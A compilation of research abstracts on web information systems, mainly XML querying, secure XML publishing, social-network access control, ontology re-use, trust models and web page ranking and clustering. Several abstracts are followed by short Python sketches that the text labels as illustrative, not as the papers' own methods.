Purpose
– The personal learning environment driven approach to learning suggests a shift in emphasis from a teacher‐driven knowledge‐push to a learner‐driven knowledge‐pull learning model. One concern with knowledge‐pull approaches is knowledge overload. The concepts of collective intelligence and the Long Tail provide a potential solution to help learners cope with the problem of knowledge overload. The paper aims to address these issues.
Design/methodology/approach
– Based on these concepts, the paper proposes a filtering mechanism that taps the collective intelligence to help learners find quality in the Long Tail, thus overcoming the problem of knowledge overload.
Findings
– The paper presents theoretical, design, and implementation details of PLEM, a Web 2.0 driven service for personal learning management, which acts as a Long Tail aggregator and filter for learning.
Originality/value
– The primary aim of PLEM is to harness the collective intelligence and leverage social filtering methods to rank and recommend learning entities.
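The abstract does not spell out the ranking formula. As a rough, purely illustrative sketch of how collective signals (bookmark counts, community ratings, tag overlap with a learner's interests) might be combined to rank Long Tail learning resources, one could write something like the following; all field names and weights are assumptions, not PLEM's actual model:

```python
# Hypothetical sketch of social filtering for learning resources: combine
# collective signals (bookmarks, ratings, tag overlap with the learner's
# interests) into a single relevance score. Weights and fields are
# illustrative, not PLEM's actual model.
import math

def social_score(resource, query_tags, w_bookmarks=0.4, w_rating=0.3, w_tags=0.3):
    # Dampen raw bookmark counts so a few very popular items do not dominate.
    popularity = math.log1p(resource["bookmarks"])
    # Normalise the average community rating to [0, 1] (assumes a 1-5 scale).
    rating = (resource["avg_rating"] - 1) / 4
    # Tag overlap between the learner's interests and the resource's tags.
    tags = set(resource["tags"])
    overlap = len(tags & set(query_tags)) / max(len(query_tags), 1)
    return w_bookmarks * popularity + w_rating * rating + w_tags * overlap

resources = [
    {"title": "Intro to RDF", "bookmarks": 120, "avg_rating": 4.2, "tags": ["rdf", "semantic-web"]},
    {"title": "Obscure niche tutorial", "bookmarks": 3, "avg_rating": 4.9, "tags": ["semantic-web", "sparql"]},
]
ranked = sorted(resources, key=lambda r: social_score(r, ["semantic-web", "sparql"]), reverse=True)
print([r["title"] for r in ranked])
```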
Purpose
The purpose of this paper is to consider the secure publishing of XML documents, where a single copy of an XML document is disseminated and a stated role‐based access control policy (RBACP) is enforced via selective encryption. It describes a more efficient solution over previously proposed approaches, in which both policy specification and key generation are performed once, at the schema‐level. In lieu of the commonly used super‐encryption technique, in which nodes residing in the intersection of multiple roles are encrypted with multiple keys, it describes a new approach called multi‐encryption that guarantees each node is encrypted at most once.
Design/methodology/approach
This paper describes two alternative algorithms for key generation and single‐pass algorithms for multi‐encrypting and decrypting a document. The solution typically results in a smaller number of keys being distributed to each user.
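A minimal sketch of the multi‐encryption idea, assuming a toy node/role model and Fernet symmetric keys (the paper's schema‐level key‐generation algorithms are not reproduced here): each distinct set of authorised roles gets one key, every node is encrypted exactly once, and a user's keyring consists of the keys whose role sets intersect the user's roles.

```python
# Rough sketch of multi-encryption: one key per distinct set of authorised
# roles, so every node is encrypted exactly once (instead of super-encrypting
# shared nodes with multiple keys). Illustrative only.
from cryptography.fernet import Fernet

nodes = {  # node id -> (content, roles allowed to read it)
    "patient/name": ("Alice", frozenset({"doctor", "nurse"})),
    "patient/diagnosis": ("flu", frozenset({"doctor"})),
    "patient/room": ("12B", frozenset({"doctor", "nurse", "admin"})),
}

# One key per distinct role set.
keys = {roleset: Fernet.generate_key() for _, roleset in nodes.values()}

encrypted = {nid: Fernet(keys[roles]).encrypt(text.encode())
             for nid, (text, roles) in nodes.items()}

def keyring(user_roles):
    """Keys distributed to a user: every key whose role set intersects theirs."""
    return {rs: k for rs, k in keys.items() if rs & user_roles}

def decrypt_visible(user_roles):
    ring = keyring(user_roles)
    out = {}
    for nid, (_, roles) in nodes.items():
        if roles in ring:
            out[nid] = Fernet(ring[roles]).decrypt(encrypted[nid]).decode()
    return out

print(decrypt_visible({"nurse"}))   # sees name and room, not diagnosis
```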
Findings
The paper proves the correctness of the presented algorithms, and provides experimental results indicating the superiority of multi‐encryption over super‐encryption, in terms of encryption and decryption time requirements. It also demonstrates the scalability of the approach as the size of the input document and complexity of the schema‐level RBACP are increased.
Research limitations/implications
An extension of this work involves designing and implementing re‐usability of keyrings when a schema or ACP is modified. In addition, more flexible solutions for handling cycles in schema graphs are possible. The current solution encounters difficulty when schema graphs are particularly deep and broad.
Practical implications
The experimental results indicate that the proposed approach is scalable, and is applicable to scenarios in which XML documents conforming to a common schema are to be securely published.
Originality/value
This paper contributes to the efficient implementation of secure XML publication systems.
Purpose
– Web‐based social networks (WBSNs) are today one of the most relevant phenomena related to the advent of Web 2.0. The purpose of this paper is to discuss the main security and privacy requirements arising in WBSNs, with a particular focus on access control, and to survey the main research activities carried out in the field. The social networking paradigm is today used not only for recreational purposes; it is also used at the enterprise level as a means to facilitate knowledge sharing and information dissemination, both at the internet and at the intranet level. As a result of the widespread use of WBSN services, millions of individuals can today easily share personal and confidential information with an incredible number of (possibly unknown) other users. Clearly, this huge amount of information and the ease with which it can be shared and disseminated pose serious security and privacy concerns.
Design/methodology/approach
– The paper discusses the main requirements related to access control and privacy enforcement in WBSNs. It presents the protection functionalities provided by today's WBSNs and examines the main research proposals defined so far, in view of the identified requirements.
Findings
– The area of access control and privacy for WBSNs is new and, therefore, many research issues still remain open. The paper provides an overview of some of these new issues.
Originality/value
– The paper provides a useful discussion of the main security and privacy requirements arising in WBSNs, with a particular focus on access control. It also surveys the main research activities carried out in the field.
Purpose
– The purpose of this research is to examine web accessibility initiative (WAI) guidelines for web accessibility so as to incorporate web accessibility in the information systems (IS) curriculum.
Design/methodology/approach
– The authors used the WebXact software accessibility evaluation tool to test the top pages of the web sites of the 23 California State University (CSU) campuses in order to identify the level of compliance with federal standards. The authors also designed and conducted a questionnaire to survey the students enrolled in the first web development course at CSU, Dominguez Hills to assess their knowledge and skills in various web accessibility topics.
Findings
– The research findings show that the majority of the CSU campuses' top web pages failed to meet WAI guidelines at some point. Moreover, two-thirds of the students who responded to the survey had no knowledge of the web accessibility topics included in the questionnaire. The results indicate that IS programs have failed to incorporate accessibility in their curricula and to produce web developers with skills and knowledge in web accessibility.
Research limitations/implications
– The limitation of this research is that the sample size is small. The authors intend to increase the number of universities' web sites tested and to survey all students in the IS program in a future study.
Practical implications
– This research is background work that will help the authors to incorporate accessibility topics in their web development courses, including web accessibility basic concepts, universal design, Section 508 of the US Rehabilitation Act, web content accessibility guidelines, WAI guidelines for web accessibility, and web accessibility testing tools.
Originality/value
– This research improves the current state of web accessibility in higher education curricula.
Purpose
The purpose of this paper is to reduce the number of join operations for retrieving Extensible Markup Language (XML) data from a relational database.
Design/methodology/approach
The paper proposes a new approach to eliminate the join operations for parent‐child traversing and/or sibling searching such that the performance of query processing could be improved. The rationale behind the design of the proposed approach is to distribute the structural information into relational databases.
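A generic illustration (not the paper's actual relational mapping) of how storing each node's immediate predecessor ID in the relational table lets parent‐child traversal and sibling search be answered by simple selections instead of joins:

```python
# Illustrative only: keeping each node's immediate predecessor (parent) ID in
# the same table lets parent-child traversal and sibling search be answered by
# selections, with no join. Schema and data are hypothetical.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("""CREATE TABLE node (
    id INTEGER PRIMARY KEY,
    parent_id INTEGER,      -- immediate predecessor's ID
    tag TEXT,
    value TEXT)""")
conn.executemany("INSERT INTO node VALUES (?,?,?,?)", [
    (1, None, "book", None),
    (2, 1, "title", "XML in a Nutshell"),
    (3, 1, "author", "Harold"),
    (4, 1, "author", "Means"),
])

# Parent-child traversal: children of node 1, no join needed.
children = conn.execute("SELECT id, tag FROM node WHERE parent_id = 1").fetchall()

# Sibling search: siblings of node 3 share its parent_id.
siblings = conn.execute(
    "SELECT id, tag FROM node WHERE parent_id = "
    "(SELECT parent_id FROM node WHERE id = 3) AND id != 3"
).fetchall()
print(children, siblings)
```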
Findings
The paper finds that the number of join operations which are needed for processing parent‐child traversal and sibling search can be bounded under the proposed approach. It also verifies the capability of the proposed approach by a series of experiments based on the XMark benchmark, for which it has encouraging results.
Research limitations/implications
Compared with previous approaches based on the structure encoding method, the proposed approach needs more space to store additional immediate predecessor's IDs. However, the approach has similar performance to others and it is much easier to implement.
Practical implications
The experimental results show that the performance of the proposed approach is within 3 per cent of that of the well‐known MonetDB approach for processing benchmark queries. Moreover, its bulkloading time is much less than that of MonetDB. The approach is therefore efficient for accessing XML data with acceptable overheads.
Originality/value
This paper contributes to the implementations of XML database systems.
Purpose
The purpose of this paper is to address the knowledge acquisition bottleneck problem in natural language processing by introducing a new rule‐based approach for the automatic acquisition of linguistic knowledge.
Design/methodology/approach
The author has developed a new machine translation methodology that only requires a bilingual lexicon and a parallel corpus of surface sentences aligned at the sentence level to learn new transfer rules.
Findings
A first prototype of a web‐based Japanese‐English translation system called Japanese‐English translation using corpus‐based acquisition of transfer (JETCAT) has been implemented in SWI‐Prolog, together with a Greasemonkey user script that analyzes Japanese web pages and translates sentences via Ajax. In addition, linguistic information is displayed at the character, word, and sentence level to provide a useful tool for web‐based language learning. An important feature is customization: the user can simply correct translation results, leading to an incremental update of the knowledge base.
Research limitations/implications
This paper focuses on the technical aspects and user interface issues of JETCAT. The author is planning to use JETCAT in a classroom setting to gather first experiences and will then evaluate a real‐world deployment; work has also started on extending JETCAT with collaborative features.
Practical implications
The research has a high practical impact on academic language education. It also could have implications for the translation industry by superseding certain translation tasks and, on the other hand, adding value and quality to others.
Originality/value
The paper presents an extended version of the paper receiving the Emerald Web Information Systems Best Paper Award at iiWAS2010.
Purpose
The discovery of the “right” ontology or ontology part is a central ingredient for effective ontology re‐use. The purpose of this paper is to present an approach for supporting a form of adaptive re‐use of sub‐ontologies, where the ontologies are deeply integrated beyond pure referencing.
Design/methodology/approach
Starting from an ontology draft which reflects the intended modeling perspective, the ontology engineer can be supported by suggesting similar already existing sub‐ontologies and ways for integrating them with the existing draft ontology. This paper's approach combines syntactic, linguistic, structural and logical methods into an innovative modeling‐perspective aware solution for detecting matchings between concepts from different ontologies. This paper focuses on the discovery and matching phase of this re‐use process.
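The following is a minimal sketch of only the label‐matching ingredient, combining a syntactic (edit‐based) and a simple linguistic (token‐overlap) similarity into one score; the weights, threshold, and concept labels are assumptions, and the structural and logical components of the approach are not shown:

```python
# Minimal sketch: combine a syntactic (edit-based) and a linguistic
# (token-overlap) signal into one label-similarity score. Weights and
# threshold are made up.
import re
from difflib import SequenceMatcher

def token_set(label):
    # Split camelCase / underscores into lower-case tokens.
    parts = re.sub(r"([a-z])([A-Z])", r"\1 \2", label).replace("_", " ").split()
    return {p.lower() for p in parts}

def label_similarity(a, b, w_syntactic=0.5, w_linguistic=0.5):
    syntactic = SequenceMatcher(None, a.lower(), b.lower()).ratio()
    ta, tb = token_set(a), token_set(b)
    linguistic = len(ta & tb) / len(ta | tb) if ta | tb else 0.0
    return w_syntactic * syntactic + w_linguistic * linguistic

def match_concepts(onto_a, onto_b, threshold=0.6):
    return [(ca, cb, round(label_similarity(ca, cb), 2))
            for ca in onto_a for cb in onto_b
            if label_similarity(ca, cb) >= threshold]

print(match_concepts(["ConferencePaper", "Author"], ["Paper", "PaperAuthor", "Venue"]))
```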
Findings
Owing to the combination of techniques presented in this general approach, the work described performs as well in the general case as approaches tailored to a specific usage scenario.
Research limitations/implications
The methods used rely on lexical information obtained from the labels of the concepts and properties in the ontologies, which makes this approach appropriate in cases where this information is available. Also, this approach can handle some missing label information.
Practical implications
Ontology engineering tasks can take advantage of the proposed adaptive re‐use approach in order to re‐use existing ontologies or parts of them without introducing inconsistencies in the resulting ontology.
Originality/value
The adaptive re‐use of ontologies by finding and partially re‐using parts of existing ontological resources for building new ontologies is a new idea in the field, and the inclusion of the modeling perspective in the computation of the matches adds a new perspective that could also be exploited by other matching approaches.
Abstract— Recently, the software industry has published several proposals for transactional processing in the Web service world. Even though most proposals support arbitrary transaction models, there exists no standardized way to describe such models. This paper describes potential impacts and use cases of utilizing advanced transaction meta-models in the Web service world and introduces two suitable meta-models for defining arbitrary advanced transaction models. In order to make these meta-models more usable in Web service environments, they had to be enhanced, and XML representations of the enhanced models had to be developed. Index Terms— Advanced transaction meta-models, advanced
Purpose
– There is still little support for the consumer decision‐making process on the web, especially when price is not the primary property of a product. Reasons for this are complex product specifications as well as the often deliberately weak interoperability between e‐commerce sites. This paper aims to address this issue.
Design/methodology/approach
– The semantic web is supposed to make product information more interoperable between different sites. Additionally, some products with limited time frames of availability, like real estate or second‐hand cars, require periodic searches over several days, weeks, or even months. For those kinds of products, existing systems cannot be applied. Instant information about new offers on the market is therefore crucial. Wireless access to the web enables services to become instantaneous and to provide up‐to‐date information to users.
Findings
– This paper presents a framework which is based on multivariate product comparison allowing users to delegate search requests to an agent. The success of the agent depends heavily on the matching algorithm. Fuzzy utility functions and the analytical hierarchy process are a very feasible combination for the scoring of offers.
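A rough sketch of how fuzzy utility functions and AHP‐derived weights could be combined to score offers is given below; the criteria, membership shapes and pairwise comparison values are illustrative assumptions, not the framework's actual matching algorithm:

```python
# Sketch of scoring real-estate offers by combining fuzzy utility functions
# with AHP-derived criteria weights. Criteria, membership shapes and the
# pairwise comparison values are illustrative assumptions.
import numpy as np

def ahp_weights(pairwise):
    """Approximate AHP priority vector via the row geometric mean."""
    m = np.asarray(pairwise, dtype=float)
    gm = m.prod(axis=1) ** (1.0 / m.shape[1])
    return gm / gm.sum()

def falling(x, full, zero):
    """Fuzzy utility that is 1 up to `full`, 0 beyond `zero` (e.g. price)."""
    return float(np.clip((zero - x) / (zero - full), 0.0, 1.0))

def rising(x, zero, full):
    """Fuzzy utility that is 0 up to `zero`, 1 beyond `full` (e.g. size)."""
    return float(np.clip((x - zero) / (full - zero), 0.0, 1.0))

# Pairwise comparisons (price vs size vs distance-to-centre), Saaty-style scale.
weights = ahp_weights([[1, 3, 5],
                       [1/3, 1, 2],
                       [1/5, 1/2, 1]])

def score(offer):
    utilities = np.array([
        falling(offer["price"], full=150_000, zero=300_000),
        rising(offer["size_m2"], zero=40, full=120),
        falling(offer["distance_km"], full=1, zero=15),
    ])
    return float(weights @ utilities)

offers = [{"id": "flat-A", "price": 180_000, "size_m2": 75, "distance_km": 3},
          {"id": "flat-B", "price": 240_000, "size_m2": 110, "distance_km": 8}]
print(sorted(offers, key=score, reverse=True)[0]["id"])
```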
Originality/value
– The proposed system supports users in finding products on the web that match specific user preferences and instantly informs them when new items become available on the virtual market. As a specific use case, the framework is being applied to the real estate sector, because several shortcomings of the current support have been identified especially for this sector.
The rapid emergence of the Mobile Internet and the constantly increasing number of wireless subscribers bring new opportunities and challenges to geographic information sharing and access. Current Web GISs, which are accessed using connection-based approaches, are very inefficient in fulfilling the requirements of GIS applications under open, dynamic, heterogeneous and distributed computing environments such as the (Mobile) Internet. In this paper, we propose a new system for accessing and sharing distributed geographic information using mobile agent and GML technologies, in which mobile agents are used to overcome the limitations of traditional distributed computing paradigms in the (mobile) Internet context and GML is adopted as the common format for spatial information wrapping and mediation, while SVG is used as a web-map publishing format that can be processed and displayed in a Web browser. A prototype is implemented, which demonstrates the effectiveness and feasibility of the proposed method.
Purpose
– This paper aims to address some security issues in open systems such as service-oriented applications and grid computing. It proposes a security framework for these systems taking a trust viewpoint. The objective is to equip the entities in these systems with mechanisms allowing them to decide about trusting or not each other before starting transactions.
Design/methodology/approach
– In this paper, the entities of open systems (web services, virtual organizations, etc.) are designed as software autonomous agents equipped with advanced communication and reasoning capabilities. Agents interact with one another by communicating using public dialogue game-based protocols and strategies on how to use these protocols. These strategies are private to individual agents, and are defined in terms of dialogue games with conditions. Agents use their reasoning capabilities to evaluate these conditions and deploy their strategies. Agents compute the trust they have in other agents, represented as a subjective quantitative value, using direct and indirect interaction histories with these other agents and the notion of social networks.
Findings
– The paper finds that trust is subject to many parameters such as the number of interactions between agents, the size of the social network, and the timely relevance of information. Combining these parameters provides a comprehensive trust model. The proposed framework is proved to be computationally efficient and simulations show that it can be used to detect malicious entities.
Originality/value
– The paper proposes different protocols and strategies for trust computation and different parameters to consider when computing this trust. It proposes an efficient algorithm for this computation and a prototype simulating it.
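The abstract does not give the trust formula; a rough sketch of how the named parameters (direct interaction history, recency of information, witnesses from the social network) might be combined into a subjective quantitative trust value could look as follows, with all weights and decay constants being assumptions:

```python
# Illustrative trust computation combining direct interaction history with
# recommendations from a social network, weighted by recency and by the
# number of interactions. Parameters are assumptions, not the paper's model.
import math, time

def interaction_trust(outcomes, decay=0.01, now=None):
    """outcomes: list of (timestamp, success_flag). Recent outcomes weigh more."""
    now = now if now is not None else time.time()
    num = den = 0.0
    for ts, ok in outcomes:
        w = math.exp(-decay * (now - ts) / 86_400)   # exponential decay per day
        num += w * (1.0 if ok else 0.0)
        den += w
    confidence = 1 - math.exp(-0.3 * len(outcomes))  # more interactions -> more confidence
    return (num / den if den else 0.5), confidence

def combined_trust(direct_outcomes, recommendations, alpha=0.7):
    """Blend direct experience with the social network's (indirect) opinion."""
    direct, conf = interaction_trust(direct_outcomes)
    if recommendations:
        indirect = sum(t * w for t, w in recommendations) / sum(w for _, w in recommendations)
    else:
        indirect = 0.5  # neutral prior when no witnesses are available
    a = alpha * conf    # rely on direct experience more when it is well supported
    return a * direct + (1 - a) * indirect

now = time.time()
history = [(now - 86_400 * d, ok) for d, ok in [(1, True), (5, True), (30, False)]]
witnesses = [(0.8, 1.0), (0.6, 0.5)]  # (reported trust, weight of the witness)
print(round(combined_trust(history, witnesses), 3))
```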
Purpose
The purpose of this paper is to introduce an expressive query language, called relational XML query language (RXQL), capable of dealing with heterogeneous Extensible Markup Language (XML) documents in data‐centric applications. In RXQL, data harmonization (i.e. the removal of heterogeneous factors from XML data) is integrated with typical data‐centric features (e.g. grouping, ordering, and aggregation).
Design/methodology/approach
RXQL is based on the XML relation representation, developed in the authors' previous work. This is a novel approach to unambiguously represent semistructured data relationally, which makes it possible in RXQL to manipulate XML data in a tuple‐oriented way, while XML data are typically manipulated in a path‐oriented way.
Findings
The user is able to describe the result of an RXQL query straightforwardly based on non‐XML syntax. The analysis of this description, through the mechanism developed in this paper, affords the automatic construction of the query result. This feature increases significantly the declarativeness of RXQL compared to the path‐oriented XML languages where the user needs to control the construction of the result extensively.
Practical implications
The authors' formal specification of the construction of the query result can be considered as an abstract implementation of RXQL.
Originality/value
RXQL is a declarative query language capable of integrating data harmonization seamlessly with other data‐centric features in the manipulation of heterogeneous XML data. So far, these kinds of XML query languages have been missing. Obviously, the expressive power of RXQL can be achieved by computationally complete XML languages, such as XQuery. However, these are not actual query languages, and the query formulation in them usually presupposes programming skills that are beyond the ordinary end‐user.
Purpose
Automated composition of semantic web services has become one of the recent critical issues in today's web environment. Despite the importance of artificial intelligence (AI)‐planning techniques for web service composition, previous works in that area do not address security issues, which is the focus of this paper. The purpose of this paper is to propose an approach to achieve security conscious composition of semantic web services.
Design/methodology/approach
The proposed approach called security conscious composition of semantic web services (SCAIMO) is based on the prior work, i.e. AIMO. The AIMO is an effective approach for web service discovery and composition based on AI‐planning, web service modeling ontology (WSMO), and description logic (DL). In this paper, definitions of secure matchmaking and web service composition are formalized based on DLs. Moreover, security capabilities and constraint types in the proposed SCAIMO framework are presented.
Findings
This paper proposes a secure task matchmaker which is responsible for matching security conscious tasks with operators and methods based on WSMO and DL to support the proposed SCAIMO framework. In addition, the paper implements and evaluates the SCAIMO using a test case and the result shows that the approach can provide an applicable solution.
Originality/value
The key contribution of this paper encompasses the new framework to support security capabilities and constraints during composition of semantic web services as well as the new secure task matchmaker.
Purpose
Estimating the sizes of query results and intermediate results is crucial to many aspects of query processing. All database systems rely on the use of cardinality estimates to choose the cheapest execution plan. In principle, the problem of cardinality estimation is more complicated in the Extensible Markup Language (XML) domain than the relational domain. The purpose of this paper is to present a novel framework for estimating the cardinality of XQuery expressions as well as their sub‐expressions. Additionally, this paper proposes a novel XQuery cardinality estimation benchmark. The main aim of this benchmark is to establish the basis of comparison between the different estimation approaches in the XQuery domain.
Design/methodology/approach
As a major innovation, the paper exploits the relational algebraic infrastructure to provide accurate estimation in the context of XML and XQuery domains. In the proposed framework, XQuery expressions are translated into equivalent relational algebraic plans; then, using a well-defined set of inference rules and a set of special properties of the algebraic plan, the framework is able to provide highly accurate estimates for XQuery expressions.
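As a generic illustration of the underlying idea (not the paper's inference rules), the following sketch propagates a cardinality estimate through a tiny plan using an equi‐width histogram for a value predicate and an assumed fan‐out statistic for a structural step:

```python
# Generic illustration: propagate a cardinality estimate through a tiny plan
# using an equi-width histogram for a value predicate and an assumed fan-out
# statistic for a structural step. Not the paper's framework.
import numpy as np

def build_histogram(values, bins=10):
    counts, edges = np.histogram(values, bins=bins)
    return counts, edges

def estimate_less_than(counts, edges, x):
    """Estimated number of tuples with value < x (partial buckets interpolated)."""
    est = 0.0
    for c, lo, hi in zip(counts, edges[:-1], edges[1:]):
        if x >= hi:
            est += c
        elif x > lo:
            est += c * (x - lo) / (hi - lo)
    return est

prices = np.random.default_rng(0).uniform(0, 100, size=10_000)
counts, edges = build_histogram(prices)

card_scan = len(prices)                               # |items|
card_select = estimate_less_than(counts, edges, 25)   # sigma(price < 25)
fanout = 3.2                                          # avg. children per item (assumed statistic)
card_step = card_select * fanout                      # item/child step under independence
print(round(card_select), round(card_step))
```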
Findings
This paper is believed to be the first to provide a uniform framework for estimating the cardinality of the more powerful XML querying capabilities of XQuery expressions as well as their sub‐expressions. It exploits the relational algebraic infrastructure to provide accurate estimation in the context of XML and XQuery domains. Moreover, the proposed framework can act as a meta‐model through its ability to incorporate different summarized XML structures and different histogram techniques, which allows model designers to achieve their targets by focusing their effort on designing or selecting the techniques adequate for them. In addition, this paper proposes a benchmark for XQuery cardinality estimation systems. The proposed benchmark distinguishes itself from other existing XML benchmarks in its focus on establishing the basis for comparing the different estimation approaches in the XML domain in terms of the accuracy of their estimations and their completeness in handling different XML querying features.
Research limitations/implications
The current version of the proposed XQuery cardinality estimation framework does not support the estimation of queries over the order information of the source XML documents and does not support non‐numeric predicates.
Practical implications
The experiments on this XQuery cardinality estimation system demonstrate its effectiveness and show highly accurate estimation results. Utilizing the cardinality estimation properties during the SQL translation of XQuery expressions results in an average improvement of 20 percent in their execution times.
Originality/value
This paper presents a novel framework for estimating the cardinality of XQuery expressions as well as its sub‐expressions. A novel XQuery cardinality estimation benchmark is introduced to establish the basis of comparison between the different estimation approaches in the XQuery domain.
Querying search engines with the keyword “jaguars” returns results as diverse as web sites about cars, computer games, attack planes, American football, and animals. More and more search engines offer options to organize query results by categories or, given a document, to return a list of links to topically related documents. While information retrieval traditionally defines similarity of documents in terms of contents, it seems natural to expect that the very structure of the Web carries important information about the topical similarity of documents. Here we study the role of a matrix constructed from weighted co-citations (documents referenced by the same document), weighted couplings (documents referencing the same document), incoming links, and outgoing links for the clustering of documents on the Web. We present and discuss three methods of clustering based on this matrix construction, using three clustering algorithms: K-means, Markov, and Maximum Spanning Tree, respectively. Our main contribution is a clustering technique based on the Maximum Spanning Tree technique and an evaluation of its effectiveness compared to the two most robust alternatives: K-means and Markov clustering.
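A small sketch of the matrix construction, assuming a toy adjacency matrix and illustrative weights, with k‐means shown as one of the three clustering algorithms:

```python
# Sketch of the weighted similarity matrix described above: co-citations
# (A^T A), couplings (A A^T) and the raw in/out links themselves, combined
# with assumed weights, then clustered. Weights and the use of k-means here
# are illustrative; the paper also studies Markov and Maximum Spanning Tree
# clustering on the same matrix.
import numpy as np
from sklearn.cluster import KMeans

# A[i, j] = 1 if document i links to document j (toy adjacency matrix).
A = np.array([[0, 1, 1, 0, 0],
              [1, 0, 1, 0, 0],
              [0, 0, 0, 1, 1],
              [0, 0, 1, 0, 1],
              [0, 0, 0, 1, 0]], dtype=float)

cocitation = A.T @ A          # documents referenced by the same document
coupling = A @ A.T            # documents referencing the same document
similarity = 0.4 * cocitation + 0.4 * coupling + 0.1 * A + 0.1 * A.T
np.fill_diagonal(similarity, 0.0)

labels = KMeans(n_clusters=2, n_init=10, random_state=0).fit_predict(similarity)
print(labels)
```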
Purpose
The purpose of this paper is to propose efficient algorithms for structural grouping over Extensible Markup Language (XML) data, called TOPOLOGICAL ROLLUP (T‐ROLLUP), which are to compute aggregation functions based on XML data with multiple hierarchical levels. They play important roles in the online analytical processing of XML data, called XML‐OLAP, with which complex analysis over XML can be performed to discover valuable information from XML.
Design/methodology/approach
Several variations of algorithms are proposed for efficient T‐ROLLUP computation. First, two basic algorithms, top‐down algorithm (TDA) and bottom‐up algorithm (BUA), are presented in which the well‐known structural‐join algorithms are used. The paper then proposes more efficient algorithms, called single‐scan by preorder number and single‐scan by postorder number (SSC‐Pre/Post), which are also based on structural joins, but have been modified from the basic algorithms so that multiple levels of grouping are computed with a single scan over the node lists. In addition, the paper adapts the algorithm for parallel execution in multi‐core environments.
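A minimal single‐scan sketch in the spirit of SSC‐Pre is shown below; it assumes nodes carry a region encoding (pre, post) and are scanned in preorder, so a stack of open grouping nodes can accumulate aggregates for all hierarchy levels at once. The data layout is illustrative, not the paper's implementation:

```python
# Minimal single-scan rollup sketch: nodes carry a region encoding (pre, post).
# Scanning grouping nodes and fact nodes together in preorder, a stack of open
# groups collects aggregates for every hierarchy level at once.

def t_rollup(nodes):
    """nodes: preorder-sorted list of dicts with keys
    pre, post, kind ('group' or 'fact'), label, value (facts only)."""
    stack, totals = [], {}
    for n in nodes:
        # Close every group whose region ends before the current node starts.
        while stack and stack[-1]["post"] < n["pre"]:
            stack.pop()
        if n["kind"] == "group":
            totals[n["label"]] = 0
            stack.append(n)
        else:
            # A fact contributes to every open (ancestor) group: multi-level rollup.
            for g in stack:
                totals[g["label"]] += n["value"]
    return totals

nodes = [
    {"pre": 1, "post": 12, "kind": "group", "label": "site"},
    {"pre": 2, "post": 7,  "kind": "group", "label": "region:EU"},
    {"pre": 3, "post": 4,  "kind": "fact",  "label": "sale", "value": 10},
    {"pre": 5, "post": 6,  "kind": "fact",  "label": "sale", "value": 5},
    {"pre": 8, "post": 11, "kind": "group", "label": "region:US"},
    {"pre": 9, "post": 10, "kind": "fact",  "label": "sale", "value": 7},
]
print(t_rollup(nodes))  # {'site': 22, 'region:EU': 15, 'region:US': 7}
```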
Findings
Several experiments are conducted with XMark and synthetic XML data to show the effectiveness of the proposed algorithms. The experiments show that proposed algorithms perform much better than the naïve implementation. In particular, the proposed SSC‐Pre and SSC‐Post perform better than TDA and BUA for all cases. Beyond that, the experiment using the parallel single scan algorithm also shows better performance than the ordinary basic algorithm.
Research limitations/implications
This paper focuses on the T‐ROLLUP operation for XML data analysis. For this reason, other operations related to XML‐OLAP, such as CUBE, WINDOWING, and RANKING should also be investigated.
Originality/value
The paper presents an extended version of one of the award winning papers at iiWAS2008.
Purpose
Information retrieval (IR) and feedback in Extensible Markup Language (XML) are rather new fields for researchers; natural questions arise, such as: how good are the feedback algorithms in XML IR? Can they be evaluated with standard evaluation tools? Even though some evaluation methods have been proposed in the literature, it is still not clear which of them are applicable in the context of XML IR, and which metrics they can be combined with to assess the quality of XML retrieval algorithms that use feedback. This paper aims to elaborate on this.
Design/methodology/approach
The efficient evaluation of relevance feedback (RF) algorithms for XML collections poses interesting challenges to IR and database researchers. The system is based on keyword queries, both for the main query and for the RF processing, rather than on the more complex XPath and structured query languages. To measure the efficiency of the system, the paper uses extended RF evaluation methodologies (residual collection and freezeTop) to evaluate the performance of XML search engines. Compared to previous approaches, the paper aims at removing the effect of the results for which the system already has knowledge about their relevance, and at measuring the improvement on unseen relevant elements. The paper implements the proposed evaluation methodologies by extending a standard evaluation tool with a module capable of assessing feedback algorithms for a specific set of metrics.
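A minimal sketch of the residual‐collection idea: elements whose relevance the system learned during feedback are removed from both the run and the judgements before the metric is computed, so only the improvement on unseen relevant elements is measured. Element identifiers and the precision@k metric are illustrative:

```python
# Sketch of residual-collection evaluation for relevance feedback: elements
# already judged during the feedback round are removed from both the ranked
# list and the relevance judgements before computing the metric.

def residual_precision_at_k(ranked, judged_relevant, seen_in_feedback, k=10):
    residual_run = [e for e in ranked if e not in seen_in_feedback]
    residual_qrels = judged_relevant - seen_in_feedback
    top_k = residual_run[:k]
    hits = sum(1 for e in top_k if e in residual_qrels)
    return hits / k

ranked_after_feedback = ["e3", "e7", "e1", "e9", "e4", "e5"]
judged_relevant = {"e1", "e3", "e9"}
seen_in_feedback = {"e3"}          # shown to the user during the feedback round
print(residual_precision_at_k(ranked_after_feedback, judged_relevant, seen_in_feedback, k=3))
```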
Findings
In this paper, the authors create an efficient XML retrieval system based on query refinement: feedback processing extends the main query terms with new terms closely related to them.
Research limitations/implications
The authors are working on more efficient retrieval algorithms to get the top‐ten results related to the submitted query. Moreover, they plan to extend the system to handle complex XPath expressions.
Originality/value
This paper presents an efficient evaluation of RF algorithms for an XML collection retrieval system.
Web resource mining for one-stop learning is an effort to turn the Web into a convenient and valuable educational resource for the self-motivated, knowledge-seeking student. It is aimed at providing an efficient and effective algorithm to generate an extremely small set of self-contained Web pages which are adequate for the student to study a technical subject of her choice well, at her own pace, without requiring her to click through numerous linked resources. In this paper, we present three different scoring measures which can be plugged into such an algorithm designed for the objective stated above. We also demonstrate the effectiveness of the algorithms proposed in this paper, which are equipped with a choice of the three scoring measures, by showing their promising experimental results. Our algorithms achieved up to 87 per cent precision on average in automatically finding relatively suitable Web resources for one-stop learning, as opposed to the 9 per cent precision offered by general purpose search engines.
Purpose
The purpose of this paper is to assign topic‐specific ratings to web pages.
Design/methodology/approach
The paper uses power iteration to assign topic‐specific rating values (called relevance) to web pages, creating a ranking or partial order among these pages for each topic. This approach depends on a set of pages that are initially assumed to be relevant for a specific topic; the spatial link structure of the web pages; and a net‐specific decay factor designated ξ.
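A minimal sketch, assuming a personalised‐PageRank‐style formulation of the power iteration (the paper's exact propagation of relevance and use of ξ may differ):

```python
# Minimal power-iteration sketch: relevance flows along links, a decay factor
# xi controls how much of it is redistributed to the seed pages assumed
# relevant for the topic. Personalised-PageRank-style assumption.
import numpy as np

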